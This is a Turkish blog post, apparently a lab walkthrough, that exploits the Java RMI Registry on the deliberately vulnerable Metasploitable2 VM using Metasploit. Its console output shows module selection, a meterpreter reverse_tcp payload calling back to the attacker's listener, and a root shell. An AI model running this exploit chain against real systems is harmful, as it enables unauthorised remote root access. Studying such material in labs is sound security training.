Ekim 19, 2021
11 11 11 ÖÖ
TCP nedir ? Aktarım Katmanı 2
Aktarım Katmanı Tcp Nedir
Yönlendirme Nedir 2 ?
Yönlendirme Nedir ?
Ağ Katmanı Nedir 2 ?
Ağ Katmanı Nedir ?
Veri Bağı Katmanı Nedir 2 ?
Android Studio Nasıl Kurulur ?
Veri Bağı Katmanı Nedir ?
Fiziksel Katman Nedir ?
Son Yazılar
TCP nedir ? Aktarım Katmanı 2 Aktarım Katmanı Tcp Nedir Yönlendirme Nedir 2 ? Yönlendirme Nedir ? Ağ Katmanı Nedir 2 ? Ağ Katmanı Nedir ? Veri Bağı Katmanı Nedir 2 ? Android Studio Nasıl Kurulur ? Veri Bağı Katmanı Nedir ? Fiziksel Katman Nedir ?
metasploitable2 exploit

Java RMI Registry Exploit Nedir ?

Paylaşım , Takip İçin

Java_rmi

Java RMI  (Remote Method Invocation – Uzak Metod Çağrısı)ile bir makina üzerinde çalışan bir java nesnesinin, başka bir makina üzerinde çalışan diğer bir java nesnesinin metodunun çağırmasını sağlanır.nmapte 1099 portunda çalıştığı görülebilir.

1099/tcp open  java-rmi         Java RMI Registry

msf6 > search java rmi

Matching Modules
================

# Name Disclosure Date Rank Check Description
– —- ————— —- —– ———–
0 exploit/multi/misc/java_jmx_server 2013-05-22 excellent Yes Java JMX Server Insecure Configuration Java Code Execution
1 auxiliary/scanner/misc/java_jmx_server 2013-05-22 normal No Java JMX Server Insecure Endpoint Code Execution Scanner
2 auxiliary/gather/java_rmi_registry normal No Java RMI Registry Interfaces Enumeration
3 exploit/multi/misc/java_rmi_server 2011-10-15 excellent Yes Java RMI Server Insecure Default Configuration Java Code Execution
4 auxiliary/scanner/misc/java_rmi_server 2011-10-15 normal No Java RMI Server Insecure Endpoint Code Execution Scanner
5 exploit/multi/browser/java_rmi_connection_impl 2010-03-31 excellent No Java RMIConnectionImpl Deserialization Privilege Escalation
6 exploit/multi/browser/java_signed_applet 1997-02-19 excellent No Java Signed Applet Social Engineering Code Execution
7 exploit/multi/http/jenkins_metaprogramming 2019-01-08 excellent Yes Jenkins ACL Bypass and Metaprogramming RCE
8 exploit/linux/misc/jenkins_java_deserialize 2015-11-18 excellent Yes Jenkins CLI RMI Java Deserialization Vulnerability
9 exploit/multi/browser/firefox_xpi_bootstrapped_addon 2007-06-27 excellent No Mozilla Firefox Bootstrapped Addon Social Engineering Code Execution
10 exploit/multi/http/totaljs_cms_widget_exec 2019-08-30 excellent Yes Total.js CMS 12 Widget JavaScript Code Injection


Interact with a module by name or index. For example info 10, use 10 or use exploit/multi/http/totaljs_cms_widget_exec

msf6 > use 3
[*] No payload configured, defaulting to java/meterpreter/reverse_tcp
msf6 exploit(multi/misc/java_rmi_server) > show options

Module options (exploit/multi/misc/java_rmi_server):

Name Current Setting Required Description
—- ————— ——– ———–
HTTPDELAY 10 yes Time that the HTTP Server will wait f
or the payload request
RHOSTS yes The target host(s), range CIDR identi
fier, or hosts file with syntax ‘file
:<path>’
RPORT 1099 yes The target port (TCP)
SRVHOST 0.0.0.0 yes The local host or network interface t
o listen on. This must be an address
on the local machine or 0.0.0.0 to li
sten on all addresses.
SRVPORT 8080 yes The local port to listen on.
SSL false no Negotiate SSL for incoming connection
s
SSLCert no Path to a custom SSL certificate (def
ault is randomly generated)
URIPATH no The URI to use for this exploit (defa
ult is random)


Payload options (java/meterpreter/reverse_tcp):

Name Current Setting Required Description
—- ————— ——– ———–
LHOST 192.168.138.128 yes The listen address (an interface may be s
pecified)
LPORT 4444 yes The listen port


Exploit target:

Id Name
— —-
0 Generic (Java Payload)


msf6 exploit(multi/misc/java_rmi_server) > set rhost 192.168.138.129
rhost => 192.168.138.129
msf6 exploit(multi/misc/java_rmi_server) > run

[*] Started reverse TCP handler on 192.168.138.128:4444
[*] 192.168.138.129:1099 – Using URL: http://0.0.0.0:8080/6kEum7A3
[*] 192.168.138.129:1099 – Local IP: http://192.168.138.128:8080/6kEum7A3
[*] 192.168.138.129:1099 – Server started.
[*] 192.168.138.129:1099 – Sending RMI Header…
[*] 192.168.138.129:1099 – Sending RMI Call…
[*] 192.168.138.129:1099 – Replied to request for payload JAR
[*] Sending stage (58082 bytes) to 192.168.138.129
[*] Meterpreter session 1 opened (192.168.138.128:4444 -> 192.168.138.129:44124) at 2021-05-29 15:22:37 +0300
[*] 192.168.138.129:1099 – Server stopped.

meterpreter > whoami
[-] Unknown command: whoami.
meterpreter > shell
Process 1 created.
Channel 1 created.
whoami
root
uname -a
Linux metasploitable 2.6.24-16-server #1 SMP Thu Apr 10 13:58:00 UTC 2008 i686 GNU/Linux

Sisteme root haklarıyla giriş yapılmıştır. 
Dilerseniz Meterpreter komutlarına bakabilirsiniz . 

Paylaşım , Takip İçin
5 1 vote
Article Rating

Bir Cevap Yazın

1 Yorum
Oldest
Newest Most Voted
Inline Feedbacks
View all comments

[…] java_rmi […]

1
0
Would love your thoughts, please comment.x
()
x
HAYALİNDEKİ YAZILIM
%d blogcu bunu beğendi: